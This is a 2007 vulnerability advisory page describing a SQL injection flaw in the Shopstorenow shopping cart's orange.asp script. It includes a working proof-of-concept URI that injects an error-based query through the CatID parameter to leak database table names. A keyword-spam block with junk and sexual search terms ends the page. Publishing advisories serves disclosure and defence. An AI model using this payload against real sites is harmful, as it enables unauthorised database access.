about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Shopstorenow E-commerce Shopping Cart Orange.ASP SQL Injection Vulnerability


Title Shopstorenow E-commerce Shopping Cart Orange.ASP SQL Injection Vulnerability
Published 2007-01-06-12:00AM
Updated 2007-01-08-05:06PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  IbnuSina is credited with the discovery of this vulnerability.
Vulnerable  Shopstorenow Ecommerce Shopping Cart 0
Not Vulnerable  
Code   Attackers can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/orange.asp?CatID=1'%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 11:22:21 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
ashiwaryas SecurityDo www.880188 PhpNuke Kerio Pers Ashwariyas Inda//r//n sex flims szredgem.c www.xiaopi Www.Sleazy Debubbler. www.bbcurd Ab phone.c Johan sex sum Crack Data 10g saxmobi SEXFREE.CO bangpai.ta you tub ve news for c maxcpm.inf phpBB2%2Fs Remote Fil W.candysex chiledsex. www.ladygu maxcpm.inf Www.Sex100 tamil sex local php www.humenq root explo Nissan:des Tabu mortin mambo Remo SashaKnox joaf ae www.ejafun knowledger maxcpm.inf t54t maxcpm.inf php-nuke+2 org/bbs/mo Www play b Rani mukrj